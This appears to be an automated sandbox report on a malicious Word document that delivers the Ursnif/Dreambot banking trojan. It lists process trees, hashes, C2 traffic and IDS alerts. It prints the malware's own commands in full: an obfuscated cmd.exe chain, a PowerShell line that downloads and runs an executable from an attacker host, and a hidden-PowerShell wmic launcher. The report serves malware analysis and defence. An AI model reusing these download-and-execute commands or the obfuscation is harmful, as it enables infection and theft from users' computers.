analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

aed0ecb1b7ab39d3541cadb7427726101d8b1cb1aa540f9bc6641de4e6b5f6ba.doc.zip

Full analysis: https://app.any.run/tasks/f0b59f81-4a62-4f5e-ad92-4b7bec2bdb0f
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 15, 2018, 13:22:43
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
loader
trojan
gozi
ursnif
dreambot
maldoc-1
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

5DCAA5E91DDC1C2F1BE7F8170558584A

SHA1:

EAEEFC751DD399994A06C0317C7651945E4FC566

SHA256:

B56A87FA73430CA05FD7E212218015DBEA9A516FA7DBADD3B1915863FDF4D5E7

SSDEEP:

768:GeDaCInQzoXawpBY1tWIuVM+KJL+2IjQw30ZSqJsHUpZLAgt4mZA0iYw8JD5Uqro:jeCIqoXawfY1XuVK3VHS1HUggr3Rxi04

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3280)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3280)
    • Application was dropped or rewritten from another process

      • Jsi.exe (PID: 2860)
      • Jsi.exe (PID: 2296)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2856)
    • Connects to CnC server

      • iexplore.exe (PID: 3000)
      • iexplore.exe (PID: 2788)
    • URSNIF was detected

      • iexplore.exe (PID: 3000)
      • iexplore.exe (PID: 2788)
    • Application was injected by another process

      • explorer.exe (PID: 1716)
    • Runs injected code in another process

      • powershell.exe (PID: 2092)
    • Runs PING.EXE for delay simulation

      • cmd.exe (PID: 2600)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • WinRAR.exe (PID: 3024)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2308)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2856)
    • Creates files in the user directory

      • powershell.exe (PID: 2856)
      • powershell.exe (PID: 2092)
    • Starts CMD.EXE for commands execution

      • explorer.exe (PID: 1716)
    • Uses WMIC.EXE to create a new process

      • explorer.exe (PID: 1716)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3280)
      • iexplore.exe (PID: 3000)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3280)
    • Reads internet explorer settings

      • iexplore.exe (PID: 3000)
      • iexplore.exe (PID: 2788)
    • Application launched itself

      • iexplore.exe (PID: 2656)
    • Changes internet zones settings

      • iexplore.exe (PID: 2656)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3000)
      • iexplore.exe (PID: 2788)
      • iexplore.exe (PID: 2656)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 788
ZipBitFlag: 0x0001
ZipCompression: Deflated
ZipModifyDate: 2018:11:15 14:15:14
ZipCRC: 0xfca5a3a3
ZipCompressedSize: 48821
ZipUncompressedSize: 90368
ZipFileName: aed0ecb1b7ab39d3541cadb7427726101d8b1cb1aa540f9bc6641de4e6b5f6ba.doc
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
55
Monitored processes
18
Malicious processes
5
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start inject winrar.exe no specs winword.exe no specs cmd.exe no specs powershell.exe jsi.exe no specs jsi.exe no specs iexplore.exe #URSNIF iexplore.exe #URSNIF iexplore.exe wmic.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs csc.exe cvtres.exe no specs explorer.exe cmd.exe no specs ping.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3024"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\aed0ecb1b7ab39d3541cadb7427726101d8b1cb1aa540f9bc6641de4e6b5f6ba.doc.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
3280"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb3024.18822\aed0ecb1b7ab39d3541cadb7427726101d8b1cb1aa540f9bc6641de4e6b5f6ba.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2308c:\rBCnwVIOisIGL\RwWzVWq\QjaZzlj\..\..\..\windows\system32\cmd.exe /C"s^e^t X^q^G=^q&&^s^e^t d^G^UV=(^$VT&&^se^t ^W^1=^y&&s^e^t ^L^Z=^'&&s^e^t ^D5^K3=^$^wF&&^se^t ^1j^s=^.S&&^se^t a^H^b=^ow&&set ^a0=e^a&&^s^et ^s^Q^h=^u&&^s^et r^Zt^D=^ ^ &&s^e^t ^wIc=N^W&&^se^t ^d^s^K9=+'^\&&^set ^BW^e=^{&&^se^t a^b^9=^e^B&&^s^et v^d^U=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^e^t RyD=^'&&^s^et ^x^a^p=n)&&^se^t ^S^xn=^in^ &&^s^e^t yv^L^Y=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^e^t ^Gn=N^W^q&&^s^et ^8^sW=)&&s^e^t ^w^P^9^L=^}&&s^e^t ^W^2J=^ N&&^se^t l^a^5J=c&&^s^et ^Sv^M=^t^h(&&^s^e^t ^GrV^A=^t&&^se^t g^z^H=^@^')^;&&^s^et ^8^u^26=m^Z&&^se^t C^Q^g^2=^p&&^se^t i^6^E=^l&&^s^et V^5^l1=c&&^se^t ^1^4^o=^.&&s^e^t ^0^8^Z^m=^t&&^s^e^t F^J=^a&&s^e^t ^i^yc=^j)&&s^e^t s^X4^S=pl&&^s^et ^L^zN=^E&&se^t m^t^B=^h&&^set C^M=o^p&&^s^e^t ^S^JV=T'^,^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^e^t i^M^a=.&&s^e^t ^f^2W3=F^a ^=&&^s^et ^G^e^Y^y=n^=^'&&se^t ^o^k^E^j=^p&&s^et f5^e^I=^x^m&&^se^t ^F^W=2^.&&^s^e^t c^dG=;^S^tar^t&&^se^t 7c^T^A=(&&^s^e^t R^8K^t=^h&&^s^et ^y^g=)&&^s^et ^bG^P=^h&&s^e^t ^f5=^'&&^se^t ^b^3B5=^x^e&&s^e^t 6^Q=^ms&&s^e^t ^Ov^P=^E&&^se^t ^g^o^xG=N^W&&^s^et ^a^5F=^t&&^s^e^t S^oV^u=^o&&^se^t ^S6^i=^a&&^se^t d^1v^g=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^se^t ^z9^y=^ -co^m^ &&^s^e^t ^mc^F==^ &&^s^e^t Rnc^0=c&&^s^et 0^EB^X=N&&^s^et ^Oi=^li^m^.&&^s^et ^D^XF=^;^$w&&^se^t s^Y^q=}^ &&^s^e^t ^ih=^e^w&&s^e^t ^g^5^y=^t&&^se^t ^y^m=^b&&^se^t ^yI=^e&&s^e^t m^9Y^K=^-^O&&^se^t ^ERu^H=^ ^ ^ ^ ^ ^ &&^se^t ^l^9^g=^x&&^s^et I^ar= ^ ^ &&s^e^t ^FRE=y^p^e &&^s^et v^D=^S&&^s^et ^y^I^L=^ &&^s^e^t ^LvC^I=^S&&^se^t V^Q^Y=^m^lh&&s^e^t ^b^8GR=^Z^j^=(&&s^e^t EN^l^b=^t&&s^e^t ^q^9=^ ^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^e^t ^G^wO=^s&&^se^t ^Q^U=s^t&&^se^t ^S^l^K^o=^}&&^s^e^t ^E8=^;f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^et s^m=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^e^t ^S^sy^g=^{&&s^e^t v^J^E=r&&s^e^t c^J^4=^'&&^s^e^t ^GB=^F&&s^e^t ^U^3=^p^e&&^s^e^t u^KH^x=^F&&^s^e^t ^X^eG^M=a^d&&^s^et y^G^OK=^t^em&&^s^e^t a^q=^a&&s^e^t ^ER3^f=^p&&s^e^t ^4^Ar=a^.&&^s^e^t u^w^3^Q=^b&&s^e^t ^o^T^X^U=^,&&^se^t ^I^4=^i^l^e&&s^e^t uI^a^2=^t&&^s^e^t ^y^ts^k=^w^F&&s^e^t ^7^5l^B=^s&&set c^0=)&&^s^et R^J^h=^y{&&^s^et ^O^x=^t&&^s^et ^L^A^b=^Js^i^.&&^s^e^t c^6^P^s=^l^3^.^w^os&&^s^e^t ^XP^Fe=^f&&s^e^t C^Z^a4=^tT&&^s^et y^O=^o&&^s^et ^3^9^4=^m ^'&&s^e^t g^W=^e&&^s^e^t e^dn^s=^;&&^se^t mv^G^K=c&&^s^e^t ^w^WV^q=^a^.^w&&se^t ^D^7jE=^m&&^se^t ^eA^m^W=^[&&s^e^t ^l3^AI=(&&^s^e^t ^4^q=r&&^s^e^t ^w^h8=^e&&^se^t 6n^I^E=c^e^s&&^s^e^t ^lb=^$^m^Z&&s^e^t ^1^l^y=v&&^s^e^t ^4Rv^y=^0&&s^e^t ^7^X=/^Y&&^se^t ^G^4=^s^.&&^se^t c^t=s^en^d()^;&&^s^e^t 6^3^L=)&&se^t w^K=^e&&^s^e^t ^xi=^-&&s^e^t m^u=^ &&s^e^t ^Bp=^j;&&s^e^t S^K=^Pr&&set d^t=R/^p&&^se^t ^l^K^J^0=T^F&&^se^t ^Xx^0=^a&&^s^e^t ^M8^d=^e&&^s^e^t ^7^FC=^W^q^ ^=N^e&&s^e^t ^D0rN=^w&&^se^t ep^S^3=^uch&&^se^t ^OEA^j=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^se^t ^qk^w1=^ -c^o&&^s^e^t 7^L=n('G&&^s^et ^w^B=^=^'I&&s^e^t ^eN^d^a=^o&&^s^et ^WL^8=^tt^p:/&&set l^f^dM=^ec&&^s^et ^Dy=^for^e&&^s^e^t dO^2^A=^.^I^O^.^Path^]&&^s^e^t uvR=^s&&s^e^t ^7^q^e=^y&&^s^e^t ^Fr=^'&&^s^e^t ^x^0=^d^b.&&s^e^t R^g=^e&&^se^t ^7^e=n&&^s^e^t 4^g^8^q=^::G^e&&s^e^t ^7^pN=^l&&^se^t ^G^d^AW=^;^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^e^t CN=F&&^s^et ^os^S=^o&&^s^et ^Y^U^oq=^sa&&^s^et ^L^Pq^u=^p^P&&^s^et C^a^x=^k&&^se^t ^6A^i=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^se^t ME^b^I=^o&&^s^et r^2=^m&&^s^e^t M^Q^T=^q^.r&&^s^e^t ^lv=/^y&&^s^e^t c^9=^s^ &&^se^t ^Os^E^I=n&&s^e^t b^Z=a^.&&^se^t ^Yq=^T&&^s^e^t ^QC^l=^a^g&&^s^e^t w^u=^j&&^se^t 4l^5=(&&^se^t ^7V^lS=^w-O^b&&s^e^t vR=^1^;&&^set D^8^f=o^m&&^s^et ^dNg^9=^w&&s^e^t ^Aa=r^eam'^;&&s^e^t ^DW^8=c^a&&^s^e^t m^H^F=b^j^e&&s^e^t ^O^H=^er^she^l&&^s^et R^B=Q^i&&^s^et ^oQd^P=r&&^s^e^t ^x^s=^it&&^s^e^t ^Sp^EC=^hp^?l&&^s^e^t ^u63^L=^i^t^e&&s^e^t V^3^O=V&&s^e^t A^Z0^w=^.&&^s^et L^i^w==^uw&&^se^t V^3=)&&^se^t ^SqJ^F=r&&^s^et M^j^Q=^e&&^se^t ^fc6=^t&&^s^et ^8^J=(^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^e^t VCu=^;^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^se^t ^F^8Yz=o^d&&^s^e^t ^Ov=^p&&^se^t ^Gz^34=rv^'^;^$b^T&&c^al^l s^e^t 1s0=%C^Q^g^2%%a^H^b%%^O^H%%i^6^E%%^q^9%%R^B%%^LvC^I%%^w^B%%^Gz^34%%^G^e^Y^y%%R^8K^t%%^WL^8%%^lv%%^QC^l%%ep^S^3%%a^q%%^oQd^P%%^s^Q^h%%^G^4%%Rnc^0%%D^8^f%%^7^X%%^L^zN%%d^t%%^yI%%^Oi%%^o^k^E^j%%^Sp^EC%%L^i^w%%g^W%%c^6^P^s%%c^J^4%%^1j^s%%s^X4^S%%^x^s%%7c^T^A%%^L^Z%%g^z^H%%d^1v^g%%r^2%%^b^8GR%%^eA^m^W%%v^D%%^W^1%%^G^wO%%y^G^OK%%dO^2^A%%4^g^8^q%%C^Z^a4%%^w^h8%%^D^7jE%%^L^Pq^u%%^S6^i%%^Sv^M%%V^3%%^d^s^K9%%^L^A^b%%R^g%%^b^3B5%%^f5%%c^0%%e^dn^s%%v^d^U%%0^EB^X%%^7^FC%%^7V^lS%%w^u%%l^f^dM%%^GrV^A%%^z9^y%%RyD%%6^Q%%f5^e^I%%^7^pN%%^F^W%%^l^9^g%%V^Q^Y%%^0^8^Z^m%%^a^5F%%^ER3^f%%^Fr%%^D^XF%%^f^2W3%%^W^2J%%^ih%%m^9Y^K%%m^H^F%%l^a^5J%%^fc6%%^qk^w1%%^3^9^4%%^X^eG^M%%^eN^d^a%%^x^0%%^Q^U%%^Aa%%^Dy%%F^J%%mv^G^K%%m^t^B%%d^G^UV%%u^KH^x%%m^u%%^S^xn%%s^m%%u^w^3^Q%%^Yq%%^x^a^p%%^BW^e%%^O^x%%v^J^E%%R^J^h%%yv^L^Y%%^Gn%%^1^4^o%%C^M%%w^K%%7^L%%^Ov^P%%^S^JV%%V^3^O%%^l^K^J^0%%^o^T^X^U%%^4Rv^y%%6^3^L%%VCu%%^wIc%%X^q^G%%i^M^a%%c^t%%^D5^K3%%^4^Ar%%^os^S%%^U^3%%^7^e%%4l^5%%^y^g%%^E8%%^D0rN%%^GB%%b^Z%%uI^a^2%%^FRE%%^mc^F%%vR%%^OEA^j%%^dNg^9%%CN%%^w^WV^q%%^SqJ^F%%^u63^L%%^8^J%%^g^o^xG%%M^Q^T%%^M8^d%%uvR%%^Ov%%ME^b^I%%^Os^E^I%%^7^5l^B%%a^b^9%%^F^8Yz%%^7^q^e%%^8^sW%%^G^d^AW%%^y^ts^k%%^Xx^0%%A^Z0^w%%^Y^U^oq%%^1^l^y%%M^j^Q%%EN^l^b%%y^O%%^XP^Fe%%^I^4%%^l3^AI%%^lb%%^i^yc%%c^dG%%^xi%%S^K%%S^oV^u%%6n^I^E%%c^9%%^6A^i%%^8^u^26%%^Bp%%^y^m%%^4^q%%^a0%%C^a^x%%^S^l^K^o%%^DW^8%%^g^5^y%%V^5^l1%%^bG^P%%^S^sy^g%%^w^P^9^L%%s^Y^q%%I^ar%%r^Zt^D%%^y^I^L%%^ERu^H%&&c^a^l^l %1^s^0%" c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2856powershell $QiS='Irv';$bTn='http://yagucharus.com/YER/pelim.php?l=uwel3.wos'.Split('@');$mZj=([System.IO.Path]::GetTempPath()+'\Jsi.exe');$NWq =New-Object -com 'msxml2.xmlhttp';$wFa = New-Object -com 'adodb.stream';foreach($VTF in $bTn){try{$NWq.open('GET',$VTF,0);$NWq.send();$wFa.open();$wFa.type = 1;$wFa.write($NWq.responseBody);$wFa.savetofile($mZj);Start-Process $mZj;break}catch{}} C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2296"C:\Users\admin\AppData\Local\Temp\Jsi.exe" C:\Users\admin\AppData\Local\Temp\Jsi.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2860"C:\Users\admin\AppData\Local\Temp\Jsi.exe" C:\Users\admin\AppData\Local\Temp\Jsi.exeJsi.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2656"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3000"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2656 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2788"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2656 CREDAT:203009C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2916"C:\Windows\system32\wbem\wmic.exe" /output:clipboard process call create "powershell -w hidden iex([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\89726C36-545A-A301-A6CD-C8873A517CAB').crypptsp))"C:\Windows\system32\wbem\wmic.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 766
Read events
2 467
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
7
Text files
12
Unknown types
4

Dropped files

PID
Process
Filename
Type
3280WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRBE9F.tmp.cvr
MD5:
SHA256:
2856powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2JWDQR6QA5AAP483ANSU.temp
MD5:
SHA256:
3280WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF522459603A5980BC.TMP
MD5:
SHA256:
3280WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{948D27BA-A28D-487E-8823-D5825EF1114E}.tmp
MD5:
SHA256:
3280WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{09E26AF9-7E40-4B26-8713-14330913101E}.tmp
MD5:
SHA256:
2656iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\favicon[1].ico
MD5:
SHA256:
2656iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
2656iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF4F9969DD21DB13DC.TMP
MD5:
SHA256:
2656iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0UU90R59\favicon[1].ico
MD5:
SHA256:
2656iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF3303ED8FA04194B7.TMP
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
5
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2856
powershell.exe
GET
200
192.162.244.201:80
http://yagucharus.com/YER/pelim.php?l=uwel3.wos
RU
executable
196 Kb
suspicious
3000
iexplore.exe
GET
200
46.17.46.114:80
http://abbtggmaazzrt.com/images/NgHr84QbLg_2/B_2BHK2qEvj/Td7Cvb48P4QJwu/wwt0C_2BX_2B2jyZoeHT_/2BEDKD0RYab4uGgd/2fzVFHNwgDsupSY/OLrBMYiDzshFB_2FWz/X90tOGNV7/bYvd0oOql5REB4SEwXWt/ATeMEUBuix1vjRG2IZM/H8Zky65.avi
RU
text
158 Kb
malicious
2788
iexplore.exe
GET
200
46.17.46.114:80
http://abbtggmaazzrt.com/images/31NhcvkiD/uPyJfSMjEHEhs2c3cN_2/FnSmcVPup5YuZ6hxjwD/2Qz01Yq8f88X9EYCDh7Hld/J87sxVA3b_2Bv/9dLi22P2/RspHEPu_2BDVMFoyQR7ddh8/4jULb1UOBH/ZLiNsBPpwIkZIsWzZ/VseYKWQHvt9S/kJrTL0XpkCe/an7vAo8U/HFqyz.avi
RU
text
1.74 Kb
malicious
2656
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
2656
iexplore.exe
GET
200
46.17.46.114:80
http://abbtggmaazzrt.com/favicon.ico
RU
image
5.30 Kb
malicious
2656
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2656
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
2656
iexplore.exe
46.17.46.114:80
abbtggmaazzrt.com
LLC Baxet
RU
malicious
2856
powershell.exe
192.162.244.201:80
yagucharus.com
RU
suspicious
2788
iexplore.exe
46.17.46.114:80
abbtggmaazzrt.com
LLC Baxet
RU
malicious
3000
iexplore.exe
46.17.46.114:80
abbtggmaazzrt.com
LLC Baxet
RU
malicious

DNS requests

Domain
IP
Reputation
yagucharus.com
  • 192.162.244.201
suspicious
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
abbtggmaazzrt.com
  • 46.17.46.114
malicious

Threats

PID
Process
Class
Message
2856
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2856
powershell.exe
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2
2856
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3000
iexplore.exe
A Network Trojan was detected
SC SPYWARE TrojanSpy:Win32/Ursnif variant
3000
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
2788
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
3 ETPRO signatures available at the full report
Process
Message
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144